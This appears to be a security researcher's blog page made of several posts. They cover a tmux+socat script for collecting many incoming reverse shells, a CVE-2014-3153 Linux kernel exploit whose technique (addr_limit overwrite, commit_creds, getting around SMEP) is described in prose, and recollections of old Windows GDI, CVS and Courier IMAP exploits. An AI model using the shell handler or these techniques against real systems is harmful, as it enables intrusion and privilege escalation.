To deal with all the shells coming your way, I suggest some tmux+socat magic I came up with when dealing with similar “problems” in the past. ;)

Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700):
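The script itself is not reproduced here. A sketch of one way to implement the idea (assuming socat and tmux are installed; the session name “alltheshells” and the unix-socket bridging are my assumptions, not necessarily the original implementation):

```shell
# Write a sketch of the handler script: socat spawns it once per incoming
# connection, with stdin/stdout wired to that TCP connection, and it bridges
# the connection into a fresh tmux window via a private unix socket.
cat > alltheshells-handler <<'EOF'
#!/bin/bash
sockdir=$(mktemp -d)
sock="$sockdir/sock"
# Ensure the tmux session exists, then open a new window for this shell.
tmux new-session -d -s alltheshells 2>/dev/null
tmux new-window -t alltheshells "socat STDIO UNIX-LISTEN:$sock"
# Wait for the window's socat to create the unix socket, then bridge:
#   tcp connection <-> this process <-> unix socket <-> tmux pane
for _ in $(seq 1 50); do [ -S "$sock" ] && break; sleep 0.1; done
socat STDIO "UNIX-CONNECT:$sock"
rm -rf "$sockdir"
EOF
chmod 700 alltheshells-handler
```

The listener could then be something along the lines of `socat TCP-LISTEN:PORT,reuseaddr,fork EXEC:./alltheshells-handler`, with `tmux attach -t alltheshells` to interact with the shells as they come in.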

Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to):

When the shells start popping you can do:

The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going.

If you want to try this with my personal spiced-up tmux configuration, download this:

Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with. :)
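For reference, the bindings described above could be reproduced with a ~/.tmux.conf fragment along these lines (a hypothetical reconstruction, not the actual downloadable config):

```shell
# Hypothetical ~/.tmux.conf fragment matching the described bindings
unbind C-b                    # free up CTRL-B for other purposes
set -g prefix M-e             # use ALT-e as the prefix (meta) key instead
bind -n M-n next-window       # ALT-n: jump to the next shell, no prefix needed
bind -n M-p previous-window   # ALT-p: jump to the previous shell
```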

CVE-2014-3153 Exploit


This awesome vulnerability, which affects pretty much all Linux kernels from the last five years, was found by Comex about a month ago. It is also the vulnerability used in TowelRoot by GeoHot to root the Samsung Galaxy S5 and a bunch of other Android-based devices. TowelRoot is closed source and heavily obfuscated though, and there are still no public exploits available for this vulnerability for desktop/server systems. So, I decided to make one myself. ;)

One of the interesting things about this vulnerability is that it is triggered through the futex() syscall, which is usually allowed even within very limited sandboxes (such as the seccomp-based one used by Google Chrome). The reason this syscall is usually allowed is that it’s used to implement threading primitives, so unless the sandboxed application is single-threaded, the futex() syscall is required.

This is not the first, and certainly not the last, time that I have developed a kernel exploit. Some of you may remember the exploit I developed for a Windows GDI vulnerability back in 2006, which Microsoft did not patch until two weeks after I demonstrated my exploit at BlackHat Europe in 2007. I must say though, this was definitely more challenging than most kernel vulnerabilities I have researched. Fortunately, challenging equals fun for me. ;)

My initial exploit patched the release() function pointer in the ptmx_fops structure, to achieve code execution in kernel context and call commit_creds(prepare_kernel_cred(0)). The problem with this approach, however, is that it is prevented by a protection mechanism known as SMEP, which is supported by Intel Haswell CPUs. Due to this, I changed my exploit to target the addr_limit value in the thread_info structure instead. This allows one of my threads to read and write arbitrary kernel memory, and thus to gain root access (and optionally disable other kernel-based protection mechanisms, such as SELinux) without executing any code in kernel context.

To Comex: great job finding this vulnerability! I first realized what a talent you have after reverse-engineering your star exploit back in 2010 (before realizing that you had released it as open source :D), which you used for the JailbreakMe 2.0 site. Judging from all the vulnerabilities you have found since then, you are no one-hit wonder either. ;) Unlike a lot of the kids these days, you find vulnerabilities that require a deep understanding of the target code in question, rather than just throwing a fuzzer at it.

To GeoHot: really impressive work developing the TowelRoot exploit in such a short amount of time! The breadth and depth of your work, ranging from PS3 jailbreaks, iPhone unlocks and jailbreaks, and now Android roots, not to mention your success in CTF competitions with PPP as well as with your one-man team, is truly an inspiration. :)

Available for projects

I am currently available for projects involving:

  • Code Auditing
  • Reverse-Engineering
  • Exploit Development
  • Vulnerability Assessments
  • Malware Analysis
  • Security Research-oriented projects in general

For more information about me and my abilities, besides what you can see in my posts here, you are welcome to take a look at my CV:


For select clients, I might also be available for teaching on the subjects of vulnerability analysis, reverse-engineering and exploit development. I have developed and held a fast-paced six-day course on these subjects before.

Since my clients tend to stick with me for a long time, this is a rare window of opportunity for those that want to establish a working relationship with me. ;) I am primarily looking for projects that I am able to do remotely.

Oldies but goldies #2: Windows GDI Kernel Exploit

Found another one of my old exploits. This one is a Windows kernel exploit from 2006. :)

This also happens to be one of the exploits I demonstrated (but did not release) at BlackHat and DefCon in 2007, in our Kernel Wars talk. It was actually still unpatched when I demonstrated it at BlackHat Europe, even though Microsoft had known about it (but did not think it was exploitable) since 2004. More information about that, and a couple of screenshots, can be found at kernelwars.blogspot.com.

In the demonstration I combined it with an exploit for another 0day we had in Office XP / Microsoft Word, to show the real impact of a privilege escalation exploit such as this one. Nowadays, kernel exploits are probably the most convenient way to break out of browser sandboxes such as the one used in Google Chrome, and of course to enable execution of unsigned code in iOS-based devices such as the iPhone and the iPad. Another nice thing about kernel vulnerabilities is that there are usually far fewer exploit mitigation mechanisms in the kernel than in userspace. ;)


Oldies but goldies: Exploits for CVS and Courier IMAP

Looking through some old disks now, and found a couple of exploits I coded back in 2004. Good old times. :)

The first one is an exploit for a double free() in CVS <= 1.11.16. It is heavily documented, since I used it as one of the examples in a six-day course on exploit development and reverse engineering I taught back then. Even though current malloc() implementations have far more integrity checks than they did back then, I think the detailed analysis of the exploitation method in the exploit comments can be quite useful for people learning exploit development today. There is often a bit too much trial & error involved when novices (and even some experienced exploit developers) write exploits; doing a detailed analysis and understanding every aspect of the vulnerability and the subsystems involved (in this case dlmalloc) is the best approach for making an exploit as reliable as possible.

The other one is an exploit for a format string vulnerability in Courier IMAP <= 3.0.3. This one required DEBUG_LOGIN to be set though, so it wasn’t that useful in the real world. Since I’ve always avoided making “target based” exploits with hardcoded addresses and offsets unless absolutely necessary, the Courier IMAP exploit automatically determines whether the target is Linux or FreeBSD, the offset to the buffer on the stack, the address of the buffer (by first determining the offset to the stack base, which was a known address back then when there was no ASLR), and the offset to the saved return address in auth_debug()’s stack frame. The shellcode is customized to do a dup2(1, 2) before executing a shell, since fd 1 pointed to the socket descriptor and fd 2 was used for logging errors. Wouldn’t want the stderr of the shell redirected to a server log. ;)

cvs-argx.c:
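As an aside, the effect of the dup2(1, 2) trick mentioned above can be illustrated in a few lines of Python (fd 1 stands in for the socket here; in the real exploit this is done in shellcode):

```python
import os
import sys

# In the exploit, fd 1 was the socket back to the attacker and fd 2 the
# server's error log. After dup2(1, 2), fd 2 refers to the same open file
# as fd 1, so anything the shell writes to stderr follows the socket
# instead of landing in the log.
os.dup2(1, 2)
assert os.fstat(1).st_ino == os.fstat(2).st_ino  # both fds now share one file
print("this would reach the attacker, not the log", file=sys.stderr)
```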